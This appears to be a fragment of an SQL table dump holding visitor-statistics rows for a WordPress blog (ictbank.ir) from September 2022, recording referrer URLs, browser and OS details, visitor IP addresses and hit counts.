(23955,'2022-09-05','http://ictbank.ir/blog','Chrome','Windows','66.0.3359.181','desktop','Unknown','','54.218.162.207','000',0,1,0),
(23956,'2022-09-05','http://82.102.9.14:80/blog','Chrome','Windows','88.0.4324.190','desktop','Unknown','','94.102.61.10','000',0,2,0),
(23957,'2022-09-05','http://ictbank.ir/blog/','Chrome','Windows','104.0.5112.97','desktop','Unknown','','45.77.62.18','000',0,1,0),
(23958,'2022-09-05','http://ictbank.ir/blog/','Chrome','Windows','104.0.5112.97','desktop','Unknown','','192.81.222.209','000',0,1,0),
(23959,'2022-09-05','http://ictbank.ir/blog/','Chrome','Windows','104.0.5112.97','desktop','Unknown','','209.97.131.196','000',0,1,0),
(23960,'2022-09-05','http://ictbank.ir/blog/','Chrome','Windows','104.0.5112.97','desktop','Unknown','','78.141.199.102','000',0,1,0),
(23961,'2022-09-06','http://ictbank.ir/blog','Chrome','Windows','70.0.3538.77','desktop','Unknown','','188.166.96.201','000',0,2,0),
(23962,'2022-09-06','http://ictbank.ir/blog','Firefox','Windows','3.6.7','desktop','Unknown','','208.80.194.122','000',0,1,0),
(23963,'2022-09-06','http://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','103.177.224.106','000',0,2,0),
(23964,'2022-09-06','http://ictbank.ir/blog','Chrome','Windows','41.0.2228.0','desktop','Unknown','','23.236.147.154','000',0,2,0),
(23965,'2022-09-06','http://ictbank.ir/blog','Firefox','Windows','3.6.18','desktop','Unknown','','208.80.194.121','000',0,3,0),
(23966,'2022-09-06','http://ictbank.ir/blog','Chrome','Linux','30.0.1599.66','desktop','Unknown','','62.210.215.118','000',0,16,0),
(23967,'2022-09-06','http://82.102.9.14:80/blog','Chrome','Windows','78.0.3904.108','desktop','Unknown','','152.89.196.62','000',0,2,0),
(23968,'2022-09-06','http://www.design-arena.ir/blog','Chrome','Windows','49.0.2623.112','desktop','Unknown','','45.249.246.151','000',0,1,0),
(23969,'2022-09-06','http://ictbank.ir/blog','Chrome','Windows','49.0.2623.112','desktop','Unknown','','154.89.5.41','000',0,1,0),
(23970,'2022-09-06','http://www.ictbank.ir/blog','Chrome','Windows','49.0.2623.112','desktop','Unknown','','154.89.5.39','000',0,1,0),
(23971,'2022-09-06','http://82.102.9.14/blog','Chrome','OS X','96.0.4664.110','desktop','Macintosh','','209.141.35.128','000',0,3,0),
(23972,'2022-09-06','http://ictbank.ir/blog','Chrome','OS X','96.0.4664.110','desktop','Macintosh','','205.185.116.89','000',0,2,0),
(23973,'2022-09-06','http://82.102.9.14/blog','Chrome','Windows','60.0.3112.113','desktop','Unknown','','162.221.192.26','000',0,2,0),
(23974,'2022-09-06','http://82.102.9.14/blog','Chrome','Windows','95.0.4638.69','desktop','Unknown','','185.220.101.185','000',0,1,0),
(23975,'2022-09-06','http://ictbank.ir/blog','Chrome','Windows','12.0.742.91','desktop','Unknown','','208.80.194.126','000',0,8,0),
(23976,'2022-09-06','http://mail.design-arena.ir/blog','Chrome','Windows','66.0.3359.117','desktop','Unknown','','128.14.209.226','000',0,2,0),
(23977,'2022-09-06','http://82.102.9.14/','Chrome','OS X','17.0.963.56','desktop','Macintosh','','23.224.186.73','000',0,3,0),
(23978,'2022-09-06','http://ictbank.ir/blog','Chrome','OS X','96.0.4664.110','desktop','Macintosh','','209.141.36.112','000',0,1,0),
(23979,'2022-09-06','http://82.102.9.14/blog','Chrome','OS X','96.0.4664.110','desktop','Macintosh','','209.141.51.222','000',0,1,0),
(23980,'2022-09-06','http://mail.design-arena.ir/blog','Chrome','OS X','96.0.4664.110','desktop','Macintosh','','205.185.121.69','000',0,1,0),
(23981,'2022-09-06','http://ictbank.ir/blog','Chrome','OS X','96.0.4664.110','desktop','Macintosh','','209.141.34.187','000',0,1,0),
(23982,'2022-09-06','http://82.102.9.14/blog','Chrome','Windows','60.0.3112.113','desktop','Unknown','','128.14.141.34','000',0,2,0),
(23983,'2022-09-06','http://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','20.163.99.182','000',0,4,0),
(23984,'2022-09-06','http://ictbank.ir','Chrome','Windows','96.0.4664.45','desktop','Unknown','','138.199.18.82','000',0,1,0),
(23985,'2022-09-06','http://ictbank.ir/blog/','Chrome','Windows','104.0.5112.97','desktop','Unknown','','209.97.135.165','000',0,1,0),
(23986,'2022-09-06','http://ictbank.ir/blog/','Chrome','Windows','104.0.5112.97','desktop','Unknown','','95.179.211.0','000',0,1,0),
(23987,'2022-09-06','http://ictbank.ir/blog/','Chrome','Windows','104.0.5112.97','desktop','Unknown','','78.141.244.3','000',0,1,0),
(23988,'2022-09-06','http://ictbank.ir/blog/','Chrome','Windows','104.0.5112.97','desktop','Unknown','','134.209.20.42','000',0,1,0),
(23989,'2022-09-06','http://ictbank.ir/blog','Chrome','Windows','84.0.4147.105','desktop','Unknown','','5.161.108.248','000',0,1,0),
(23990,'2022-09-06','http://82.102.9.14/blog','Chrome','Windows','60.0.3112.90','desktop','Unknown','','180.149.125.162','000',0,1,0),
(23991,'2022-09-06','http://ictbank.ir/blog','Chrome','Linux','61.0.3163.79','desktop','Unknown','','64.124.8.44','000',0,1,0),
(23992,'2022-09-07','http://82.102.9.14/blog','Chrome','Windows','60.0.3112.113','desktop','Unknown','','128.1.248.26','000',0,2,0),
(23993,'2022-09-07','http://ictbank.ir/blog','Chrome','Linux','30.0.1599.66','desktop','Unknown','','62.210.215.118','000',0,16,0),
(23994,'2022-09-07','http://82.102.9.14:80/blog','Chrome','Windows','78.0.3904.108','desktop','Unknown','','152.89.196.62','000',0,4,0),
(23995,'2022-09-07','http://ictbank.ir/blog','Chrome','Windows','10.0.648.133','desktop','Unknown','','208.80.194.121','000',0,3,0),
(23996,'2022-09-07','http://ictbank.ir/blog','Internet Explorer','Windows','10.0','desktop','','','54.176.19.171','000',0,1,0),
(23997,'2022-09-07','http://ictbank.ir/blog','Firefox','Windows','9.0.1','desktop','Unknown','','208.80.194.122','000',0,3,0),
(23998,'2022-09-07','http://ictbank.ir/blog','Chrome','Windows','80.0.3987.149','desktop','Unknown','','185.119.81.99','000',0,10,0),
(23999,'2022-09-07','http://ictbank.ir/blog','Chrome','Linux','61.0.3163.79','desktop','Unknown','','64.124.8.45','000',0,4,0),
(24000,'2022-09-07','http://82.102.9.14:80/blog','Chrome','Windows','88.0.4324.190','desktop','Unknown','','94.102.61.10','000',0,2,0),
(24001,'2022-09-07','http://ictbank.ir/blog','Firefox','Windows','8.0','desktop','Unknown','','139.162.211.31','000',0,2,0),
(24002,'2022-09-07','http://ictbank.ir/blog','Opera','Windows','8.01','desktop','Unknown','','208.80.194.126','000',0,3,0),
(24003,'2022-09-07','http://82.102.9.14/blog','Chrome','Windows','60.0.3112.113','desktop','Unknown','','128.14.134.134','000',0,2,0),
(24004,'2022-09-07','http://ictbank.ir/blog','Chrome','Windows','71.0.3578.98','desktop','Unknown','','93.159.230.88','000',0,2,0),
(24005,'2022-09-07','http://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','202.21.38.198','000',0,2,0),
(24006,'2022-09-07','http://ictbank.ir/blog','Chrome','Windows','71.0.3578.98','desktop','Unknown','','77.74.177.119','000',0,1,0),
(24007,'2022-09-07','http://ictbank.ir/blog','Chrome','Linux','61.0.3163.79','desktop','Unknown','','64.124.8.35','000',0,1,0),
(24008,'2022-09-07','http://ictbank.ir/blog','Chrome','OS X','24.0.1309.0','desktop','Macintosh','','181.214.206.161','000',0,2,0),
(24009,'2022-09-07','http://82.102.9.14:80/','Chrome','Windows','99.0.4896.127','desktop','Unknown','','188.132.181.246','000',0,2,0),
(24010,'2022-09-07','http://ictbank.ir/blog/','Chrome','Windows','104.0.5112.97','desktop','Unknown','','192.81.222.35','000',0,1,0),
(24011,'2022-09-07','http://ictbank.ir/blog/','Chrome','Windows','104.0.5112.97','desktop','Unknown','','95.179.211.0','000',0,1,0),
(24012,'2022-09-07','http://ictbank.ir/blog/','Chrome','Windows','104.0.5112.97','desktop','Unknown','','209.97.135.165','000',0,1,0),
(24013,'2022-09-07','http://ictbank.ir/blog/','Chrome','Windows','104.0.5112.97','desktop','Unknown','','78.141.244.3','000',0,1,0),
(24014,'2022-09-07','http://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','103.177.224.87','000',0,2,0),
(24015,'2022-09-07','http://ictbank.ir/blog','Firefox','Windows','8.0','desktop','Unknown','','178.79.169.97','000',0,2,0),
(24016,'2022-09-07','http://82.102.9.14/blog/sitemap.xml','Safari','OS X','15.0','desktop','Macintosh','','106.75.64.4','000',0,10,0),
(24017,'2022-09-08','http://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','181.214.218.69','000',0,2,0),
(24018,'2022-09-08','http://ictbank.ir/blog','Opera','Windows','8.01','desktop','Unknown','','208.80.194.126','000',0,7,0),
(24019,'2022-09-08','http://ictbank.ir/blog','Chrome','Linux','61.0.3163.79','desktop','Unknown','','64.124.8.39','000',0,1,0),
(24020,'2022-09-08','http://ictbank.ir/blog','Chrome','Windows','105.0.0.0','desktop','Unknown','','204.18.82.14','000',0,1,0),
(24021,'2022-09-08','http://ictbank.ir/blog','Chrome','Linux','30.0.1599.66','desktop','Unknown','','62.210.215.118','000',0,4,0),
(24022,'2022-09-08','http://wikisonnati.com/blog','Safari','OS X','15.4','desktop','Macintosh','','80.73.244.208','000',0,2,0),
(24023,'2022-09-08','http://82.102.9.14/blog','Chrome','Windows','60.0.3112.113','desktop','Unknown','','162.221.192.26','000',0,2,0),
(24024,'2022-09-08','http://ictbank.ir/blog','Chrome','Windows','83.0.4103.106','desktop','Unknown','','18.206.55.48','000',0,2,0),
(24025,'2022-09-08','http://ictbank.ir/blog','Chrome','Linux','95.0.4638.69','desktop','Unknown','','3.80.35.71','000',0,1,0),
(24026,'2022-09-08','http://www.wikisonnati.com/blog','Firefox','Windows','89.0','desktop','Unknown','','137.74.27.104','000',0,2,0),
(24027,'2022-09-08','http://ictbank.ir/blog','Opera','Windows','8.01','desktop','Unknown','','208.80.194.122','000',0,1,0),
(24028,'2022-09-08','http://ictbank.ir/blog','Chrome','Windows','14.0.835.187','desktop','Unknown','','208.80.194.121','000',0,2,0),
(24029,'2022-09-08','http://ictbank.ir/blog','Chrome','Windows','103.0.5060.134','desktop','Unknown','','62.152.55.125','000',0,1,0),
(24030,'2022-09-08','http://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','103.177.224.103','000',0,2,0),
(24031,'2022-09-08','http://ictbank.ir/blog','Chrome','OS X','104.0.0.0','desktop','Macintosh','','151.234.142.80','000',0,2,0),
(24032,'2022-09-08','http://82.102.9.14:80/blog','Unknown','Unknown','Unknown','','Unknown','','143.92.32.138','000',0,3,0),
(24033,'2022-09-08','http://ictbank.ir/blog','Chrome','Windows','74.0.3729.169','desktop','Unknown','','134.209.155.153','000',0,1,0),
(24034,'2022-09-08','http://ictbank.ir/blog','Chrome','Linux','103.0.5060.134','desktop','Unknown','','35.165.215.140','000',0,1,0),
(24035,'2022-09-08','http://ictbank.ir','Chrome','Windows','96.0.4664.45','desktop','Unknown','','45.88.97.217','000',0,1,0),
(24036,'2022-09-08','http://82.102.9.14:80/blog','Chrome','Windows','78.0.3904.108','desktop','Unknown','','152.89.196.62','000',0,1,0),
(24037,'2022-09-08','http://82.102.9.14/blog','Chrome','Windows','60.0.3112.113','desktop','Unknown','','128.14.134.170','000',0,2,0),
(24038,'2022-09-08','http://ictbank.ir/blog/','Chrome','Windows','104.0.5112.97','desktop','Unknown','','159.65.21.153','000',0,1,0),
(24039,'2022-09-08','http://ictbank.ir/blog/','Chrome','Windows','104.0.5112.97','desktop','Unknown','','45.77.62.18','000',0,1,0),
(24040,'2022-09-08','http://ictbank.ir/blog/','Chrome','Windows','104.0.5112.97','desktop','Unknown','','134.209.20.42','000',0,1,0),
(24041,'2022-09-08','http://ictbank.ir/blog/','Chrome','Windows','104.0.5112.97','desktop','Unknown','','104.238.170.64','000',0,1,0),
(24042,'2022-09-08','http://82.102.9.14/blog','Firefox','Linux','73.0','desktop','Unknown','','134.209.45.153','000',0,2,0),
(24043,'2022-09-08','http://ictbank.ir/blog','Firefox','Windows','58.0','desktop','Unknown','','20.163.120.201','000',0,2,0),
(24044,'2022-09-08','http://82.102.9.14/blog','Chrome','Windows','60.0.3112.113','desktop','Unknown','','185.180.143.18','000',0,2,0),
(24045,'2022-09-08','http://ictbank.ir/blog','Chrome','Linux','85.0.4183.83','desktop','Unknown','','195.123.241.30','000',0,1,0),
(24046,'2022-09-08','http://ictbank.ir/blog','Firefox','Windows','77.0','desktop','Unknown','','41.139.175.237','000',0,1,0),
(24047,'2022-09-08','http://ictbank.ir/blog','Firefox','Windows','77.0','desktop','Unknown','','58.84.57.138','000',0,1,0),
(24048,'2022-09-08','http://ictbank.ir/blog','Firefox','Windows','77.0','desktop','Unknown','','82.114.68.46','000',0,1,0),
(24049,'2022-09-08','http://ictbank.ir/blog','Chrome','Windows','41.0.2228.0','desktop','Unknown','','185.142.236.41','000',0,2,0),
(24050,'2022-09-08','http://ictbank.ir/blog','Firefox','Windows','77.0','desktop','Unknown','','45.201.194.146','000',0,1,0),
(24051,'2022-09-08','http://ictbank.ir/blog','Chrome','Windows','85.0.4183.121','desktop','Unknown','','189.56.217.183','000',0,2,0),
(24052,'2022-09-09','http://ictbank.ir/blog','Firefox','Windows','9.0.1','desktop','Unknown','','208.80.194.126','000',0,8,0),
(24053,'2022-09-09','http://82.102.9.14:80/blog','Chrome','Windows','88.0.4324.190','desktop','Unknown','','94.102.61.10','000',0,2,0),
(24054,'2022-09-09','http://ictbank.ir/blog','Opera','Windows','89.0.4447.51','desktop','Unknown','','144.168.228.92','000',0,13,0),
(24055,'2022-09-09','http://www.ictbank.ir/blog','Opera','Windows','89.0.4447.51','desktop','Unknown','','196.18.225.148','000',0,2,0),
(24056,'2022-09-09','http://82.102.9.14:80/blog','Unknown','Unknown','Unknown','','Unknown','','143.92.32.138','000',0,3,0),
(24057,'2022-09-09','http://ictbank.ir/blog','Firefox','Windows','58.0','desktop','Unknown','','20.163.120.201','000',0,2,0),
(24058,'2022-09-09','http://82.102.9.14/blog','Chrome','Windows','60.0.3112.113','desktop','Unknown','','128.14.133.58','000',0,2,0),
(24059,'2022-09-09','http://ictbank.ir/blog','Vivaldi','Windows','5.3.2679.68','desktop','Unknown','','103.221.235.168','000',0,12,0),
(24060,'2022-09-09','http://www.ictbank.ir/blog','Vivaldi','Windows','5.3.2679.68','desktop','Unknown','','23.231.13.196','000',0,2,0),
(24061,'2022-09-09','http://82.102.9.14:80/blog','Chrome','Windows','78.0.3904.108','desktop','Unknown','','152.89.196.62','000',0,13,0),
(24062,'2022-09-09','http://ictbank.ir/','Chrome','Linux','103.0.0.0','desktop','Unknown','','94.158.36.183','000',0,1,0),
(24063,'2022-09-09','http://ictbank.ir/blog','Firefox','Windows','8.0','desktop','Unknown','','85.159.215.86','000',0,2,0),
(24064,'2022-09-09','http://ictbank.ir/blog','Chrome','Windows','66.0.3359.181','desktop','Unknown','','34.209.87.148','000',0,1,0),
(24065,'2022-09-09','http://ictbank.ir/blog','Internet Explorer','Windows','8.0','desktop','Unknown','','208.80.194.121','000',0,2,0),
(24066,'2022-09-09','http://82.102.9.14/blog','Chrome','Windows','95.0.4638.69','desktop','Unknown','','193.218.118.158','000',0,1,0),
(24067,'2022-09-09','http://82.102.9.14/blog','Chrome','OS X','96.0.4664.110','desktop','Macintosh','','209.141.49.169','000',0,1,0),
(24068,'2022-09-09','http://ictbank.ir/blog','Chrome','OS X','96.0.4664.110','desktop','Macintosh','','205.185.116.25','000',0,1,0),
(24069,'2022-09-09','http://mail.design-arena.ir/blog','Chrome','OS X','96.0.4664.110','desktop','Macintosh','','209.141.55.120','000',0,1,0),
(24070,'2022-09-09','http://ictbank.ir/blog','Firefox','Windows','3.6.7','desktop','Unknown','','208.80.194.122','000',0,2,0),
(24071,'2022-09-09','http://ictbank.ir/blog/','Chrome','Windows','104.0.5112.97','desktop','Unknown','','82.196.5.234','000',0,1,0),
(24072,'2022-09-09','http://ictbank.ir/blog/','Chrome','Windows','104.0.5112.97','desktop','Unknown','','108.61.123.152','000',0,1,0),
(24073,'2022-09-09','http://ictbank.ir/blog/','Chrome','Windows','104.0.5112.97','desktop','Unknown','','104.238.170.64','000',0,2,0),
(24074,'2022-09-09','http://ictbank.ir/blog','Chrome','Linux','30.0.1599.66','desktop','Unknown','','62.210.215.118','000',0,2,0),
(24075,'2022-09-10','http://ictbank.ir/blog','Firefox','Windows','9.0.1','desktop','Unknown','','193.92.182.236','000',0,3,0),
(24076,'2022-09-10','http://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','51.120.2.59','000',0,1,0),
(24077,'2022-09-10','http://82.102.9.14/blog','Chrome','Windows','60.0.3112.113','desktop','Unknown','','128.1.248.26','000',0,2,0),
(24078,'2022-09-10','http://ictbank.ir/blog','Chrome','Windows','88.0.4324.190','desktop','Unknown','','23.229.113.138','000',0,3,0),
(24079,'2022-09-10','http://ictbank.ir/blog','Chrome','Windows','14.0.835.187','desktop','Unknown','','208.80.194.122','000',0,5,0),
(24080,'2022-09-10','http://wikisonnati.com/blog','Yandex Browser','Windows','22.7.0','desktop','Unknown','','31.222.247.179','000',0,2,0),
(24081,'2022-09-10','http://82.102.9.14/blog','Chrome','Windows','49.0.2623.112','desktop','Unknown','','106.75.152.94','000',0,1,0),
(24082,'2022-09-10','http://82.102.9.14:80/blog','Firefox','Windows','83.0','desktop','Unknown','','213.178.252.117','000',0,4,0),
(24083,'2022-09-10','http://82.102.9.14:80/blog','360 Safe Explorer','Windows','Unknown','desktop','Unknown','','101.68.211.2','000',0,4,0),
(24084,'2022-09-10','http://82.102.9.14/blog','Chrome','Windows','60.0.3112.113','desktop','Unknown','','128.14.134.170','000',0,3,0),
(24085,'2022-09-10','http://ictbank.ir/blog','Chrome','Windows','98.0.4758.102','desktop','Unknown','','185.119.81.99','000',0,2,0),
(24086,'2022-09-10','http://ictbank.ir/blog','Chrome','Windows','41.0.2228.0','desktop','Unknown','','94.102.49.193','000',0,2,0),
(24087,'2022-09-10','http://baidu.com/','MIUI Browser','Android','10.1.1','mobile:smart','Mi Note 2','','180.163.220.68','000',0,1,0),
(24088,'2022-09-10','http://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','209.141.46.74','000',0,2,0),
(24089,'2022-09-10','http://ictbank.ir/blog','Firefox','Windows','3.6.13','desktop','Unknown','','208.80.194.126','000',0,2,0),
(24090,'2022-09-10','http://ictbank.ir/blog','Firefox','OS X','3.6.11','desktop','Macintosh','','208.80.194.121','000',0,3,0),
(24091,'2022-09-10','http://ictbank.ir/blog/index.php/2020/03/24/one-way-to-prevent-ddos-attacks-in-wordpress/#comment-82','Chrome','Windows','90.0.4430.72','desktop','Unknown','','178.159.37.11','000',0,8,0),
(24092,'2022-09-10','http://ictbank.ir/blog','Chrome','Windows','66.0.3359.181','desktop','Unknown','','35.91.237.220','000',0,1,0),
(24093,'2022-09-10','http://82.102.9.14:80/blog','Firefox','Windows','65.0','desktop','Unknown','','45.83.66.17','000',0,1,0),
(24094,'2022-09-10','http://ictbank.ir/blog','Chrome','Windows','84.0.4147.105','desktop','Unknown','','185.119.81.101','000',0,2,0),
(24095,'2022-09-10','http://ictbank.ir/blog','Chrome','OS X','39.0.2171.95','desktop','Macintosh','','135.181.44.231','000',0,7,0),
(24096,'2022-09-10','http://82.102.9.14:80/blog','Chrome','Windows','88.0.4324.190','desktop','Unknown','','94.102.61.10','000',0,2,0),
(24097,'2022-09-10','http://ictbank.ir/blog/','Chrome','Windows','104.0.5112.97','desktop','Unknown','','78.141.199.102','000',0,1,0),
(24098,'2022-09-10','http://ictbank.ir/blog/','Chrome','Windows','104.0.5112.97','desktop','Unknown','','185.14.187.177','000',0,1,0),
(24099,'2022-09-10','http://ictbank.ir/blog/','Chrome','Windows','104.0.5112.97','desktop','Unknown','','78.141.244.3','000',0,2,0),
(24100,'2022-09-10','http://ictbank.ir/blog','Edge','Windows','91.0.864.54','desktop','Unknown','','81.169.136.222','000',0,1,0),
(24101,'2022-09-10','http://82.102.9.14:80/blog','Chrome','Windows','78.0.3904.108','desktop','Unknown','','152.89.196.211','000',0,2,0),
(24102,'2022-09-11','http://ictbank.ir/blog','Safari','OS X','5.1','desktop','Macintosh','','208.80.194.121','000',0,4,0),
(24103,'2022-09-11','http://82.102.9.14/blog','Chrome','Windows','60.0.3112.113','desktop','Unknown','','128.14.209.162','000',0,2,0),
(24104,'2022-09-11','http://ictbank.ir/blog','Firefox','Windows','66.0','desktop','Unknown','','51.254.199.11','000',0,2,0),
(24105,'2022-09-11','http://82.102.9.14:80/blog','Chrome','Windows','78.0.3904.108','desktop','Unknown','','152.89.196.211','000',0,7,0),
(24106,'2022-09-11','http://ictbank.ir/blog','Chrome','Windows','41.0.2228.0','desktop','Unknown','','66.240.236.119','000',0,2,0),
(24107,'2022-09-11','http://ictbank.ir/blog','Chrome','Windows','89.0.4389.114','desktop','Unknown','','20.163.120.201','000',0,1,0),
(24108,'2022-09-11','http://ictbank.ir/blog','Chrome','Linux','30.0.1599.66','desktop','Unknown','','62.210.215.118','000',0,4,0),
(24109,'2022-09-11','http://82.102.9.14/blog','Internet Explorer','Windows','10.0','desktop','Unknown','','92.118.39.86','000',0,2,0),
(24110,'2022-09-11','http://wikisonnati.ir/blog','Unknown','Android','Unknown','tablet','Unknown','','185.27.99.118','000',0,1,0),
(24111,'2022-09-11','http://wikisonnati.ir/blog/','Unknown','Android','Unknown','tablet','Unknown','','185.27.99.140','000',0,1,0),
(24112,'2022-09-11','http://ictbank.ir/blog','Firefox','Windows','3.6.18','desktop','Unknown','','208.80.194.126','000',0,5,0),
(24113,'2022-09-11','http://ictbank.ir/blog','Chrome','Windows','58.0.3021.58','desktop','Unknown','','54.208.7.140','000',0,1,0),
(24114,'2022-09-11','http://ictbank.ir/blog','Chrome','Linux','61.0.3163.79','desktop','Unknown','','64.124.8.37','000',0,3,0),
(24115,'2022-09-11','http://ictbank.ir/blog','Chrome','Linux','61.0.3163.79','desktop','Unknown','','64.124.8.38','000',0,3,0),
(24116,'2022-09-11','http://82.102.9.14/blog','Chrome','Windows','60.0.3112.113','desktop','Unknown','','128.14.141.34','000',0,2,0),
(24117,'2022-09-11','http://mail.design-arena.ir/blog','Chrome','OS X','96.0.4664.110','desktop','Macintosh','','8.45.47.67','000',0,1,0),
(24118,'2022-09-11','http://82.102.9.14/blog','Chrome','OS X','96.0.4664.110','desktop','Macintosh','','209.141.55.120','000',0,1,0),
(24119,'2022-09-11','http://ictbank.ir/blog','Chrome','OS X','96.0.4664.110','desktop','Macintosh','','209.141.36.112','000',0,1,0),
(24120,'2022-09-11','http://ictbank.ir/blog','Internet Explorer','Windows','9.0','desktop','Unknown','','208.80.194.122','000',0,2,0),
(24121,'2022-09-11','http://ictbank.ir/blog','Chrome','Windows','66.0.3359.181','desktop','Unknown','','34.220.230.242','000',0,1,0),
(24122,'2022-09-11','http://ictbank.ir/blog','Chrome','Linux','61.0.3163.79','desktop','Unknown','','64.124.8.36','000',0,1,0),
(24123,'2022-09-11','http://ictbank.ir/blog','Chrome','Windows','92.0.4515.131','desktop','Unknown','','185.119.81.101','000',0,2,0),
(24124,'2022-09-11','http://ictbank.ir/blog','Chrome','Linux','61.0.3163.79','desktop','Unknown','','64.124.8.47','000',0,1,0),
(24125,'2022-09-11','http://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','205.185.113.166','000',0,2,0),
(24126,'2022-09-11','http://ictbank.ir/blog/','Chrome','Windows','104.0.5112.97','desktop','Unknown','','185.14.184.197','000',0,1,0),
(24127,'2022-09-11','http://ictbank.ir/blog/','Chrome','Windows','104.0.5112.97','desktop','Unknown','','198.211.125.219','000',0,1,0),
(24128,'2022-09-11','http://ictbank.ir/blog/','Chrome','Windows','104.0.5112.97','desktop','Unknown','','78.141.199.102','000',0,1,0),
(24129,'2022-09-11','http://ictbank.ir/blog/','Chrome','Windows','104.0.5112.97','desktop','Unknown','','78.141.244.3','000',0,1,0),
(24130,'2022-09-11','http://ictbank.ir/blog/index.php/category/web-security/apache/','Chrome','Windows','90.0.4430.93','desktop','Unknown','','37.139.53.30','000',0,7,0),
(24131,'2022-09-11','http://ictbank.ir/blog','Firefox','Windows','65.0','desktop','Unknown','','184.94.240.88','000',0,2,0),
(24132,'2022-09-11','http://ictbank.ir/blog','Firefox','Windows','102.0','desktop','Unknown','','217.138.194.122','000',0,1,0),
(24133,'2022-09-12','http://ictbank.ir/blog','Chrome','OS X','14.0.835.202','desktop','Macintosh','','208.80.194.126','000',0,3,0),
(24134,'2022-09-12','http://ictbank.ir/blog','Chrome','Linux','61.0.3163.79','desktop','Unknown','','64.124.8.50','000',0,1,0),
(24135,'2022-09-12','http://ictbank.ir','Chrome','Windows','96.0.4664.45','desktop','Unknown','','45.88.97.217','000',0,2,0),
(24136,'2022-09-12','http://ictbank.ir/blog','Firefox','Windows','55.0','desktop','Unknown','','45.61.186.85','000',0,2,0),
(24137,'2022-09-12','https://www.bing.com/','Edge','OS X','105.0.1343.33','desktop','Macintosh','','73.184.134.116','000',0,1,0),
(24138,'2022-09-12','http://ictbank.ir/blog','Chrome','Windows','14.0.835.187','desktop','Unknown','','208.80.194.121','000',0,1,0),
(24139,'2022-09-12','http://ictbank.ir/blog','Chrome','Windows','100.0.4896.127','desktop','Unknown','','5.188.62.76','000',0,4,0),
(24140,'2022-09-12','http://ictbank.ir/blog','Edge','Windows','44','gaming:console','Xbox One','','194.36.97.224','000',0,12,0),
(24141,'2022-09-12','http://www.ictbank.ir/blog','Edge','Windows','44','gaming:console','Xbox One','','196.18.225.148','000',0,2,0),
(24142,'2022-09-12','http://82.102.9.14:80/blog','Chrome','Windows','88.0.4324.190','desktop','Unknown','','94.102.61.10','000',0,2,0),
(24143,'2022-09-12','http://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','202.21.38.56','000',0,2,0),
(24144,'2022-09-12','http://ictbank.ir/blog','Edge','Windows','44','gaming:console','Xbox One','','168.90.196.207','000',0,8,0),
(24145,'2022-09-12','http://ictbank.ir/blog/','Edge','Windows','44','gaming:console','Xbox One','','192.3.100.245','000',0,2,0),
(24146,'2022-09-12','http://82.102.9.14/blog','Chrome','Windows','60.0.3112.113','desktop','Unknown','','128.14.134.170','000',0,3,0),
(24147,'2022-09-12','http://ictbank.ir/blog','Chrome','Linux','105.0.5195.102','desktop','Unknown','','54.203.73.198','000',0,1,0),
(24148,'2022-09-12','http://ictbank.ir/blog','Chrome','Windows','105.0.0.0','desktop','Unknown','','85.133.232.202','000',0,3,0),
(24149,'2022-09-12','http://ictbank.ir/blog','Safari','iOS','15.1','mobile:smart','iPhone','','51.81.167.146','000',0,2,0),
(24150,'2022-09-12','http://ictbank.ir/blog','Firefox','Windows','59.0','desktop','Unknown','','79.104.53.14','000',0,1,0),
(24151,'2022-09-12','http://ictbank.ir/blog','Edge','Windows','18','desktop','Unknown','','107.178.207.143','000',0,1,0),
(24152,'2022-09-12','http://82.102.9.14/blog','Chrome','Windows','60.0.3112.113','desktop','Unknown','','185.180.143.72','000',0,2,0),
(24153,'2022-09-12','http://ictbank.ir/blog','Internet Explorer','Windows','6.0','desktop','Unknown','','208.80.194.122','000',0,3,0),
(24154,'2022-09-12','http://ictbank.ir/blog','Chrome','Windows','95.0.4638.69','desktop','Unknown','','185.119.81.101','000',0,2,0),
(24155,'2022-09-12','http://ictbank.ir/blog','Safari','iOS','Unknown','mobile:smart','iPhone','','208.100.26.230','000',0,2,0),
(24156,'2022-09-12','http://82.102.9.14/blog','Chrome','Windows','95.0.4638.69','desktop','Unknown','','185.235.146.29','000',0,1,0),
(24157,'2022-09-12','http://ictbank.ir/blog','Chrome','Windows','67.0.3396.87','desktop','Unknown','','212.47.231.175','000',0,1,0),
(24158,'2022-09-12','http://ictbank.ir/blog/','Chrome','Windows','104.0.5112.97','desktop','Unknown','','82.196.5.234','000',0,1,0),
(24159,'2022-09-12','http://ictbank.ir/blog/','Chrome','Windows','104.0.5112.97','desktop','Unknown','','78.141.244.3','000',0,1,0),
(24160,'2022-09-12','http://ictbank.ir/blog/','Chrome','Windows','104.0.5112.97','desktop','Unknown','','134.209.20.42','000',0,2,0),
(24161,'2022-09-12','http://www.design-arena.ir/blog','Chrome','Windows','66.0.3359.117','desktop','Unknown','','23.90.160.138','000',0,2,0),
(24162,'2022-09-12','http://ictbank.ir/blog','Chrome','Linux','30.0.1599.66','desktop','Unknown','','62.210.215.118','000',0,2,0),
(24163,'2022-09-12','http://ictbank.ir/blog','Chrome','Windows','79.0','desktop','Unknown','','209.182.103.18','000',0,1,0),
(24164,'2022-09-12','http://ictbank.ir/blog','Safari','Windows','5.0.4','desktop','Unknown','','18.232.133.132','000',0,2,0),
(24165,'2022-09-12','http://www.wikisonnati.ir/blog','Firefox','Windows','89.0','desktop','Unknown','','51.75.95.101','000',0,2,0),
(24166,'2022-09-13','http://ictbank.ir/blog','Chrome','Linux','30.0.1599.66','desktop','Unknown','','62.210.215.118','000',0,16,0),
(24167,'2022-09-13','http://ictbank.ir/blog','Firefox','Windows','3.6.8','desktop','Unknown','','208.80.194.126','000',0,5,0),
(24168,'2022-09-13','http://ictbank.ir/blog','Firefox','OS X','3.6.11','desktop','Macintosh','','208.80.194.122','000',0,4,0),
(24169,'2022-09-13','http://ictbank.ir/blog','Chrome','Windows','83.0.4103.97','desktop','Unknown','','185.119.81.101','000',0,4,0),
(24170,'2022-09-13','http://82.102.9.14:80/blog','Chrome','Windows','78.0.3904.108','desktop','Unknown','','152.89.196.211','000',0,8,0),
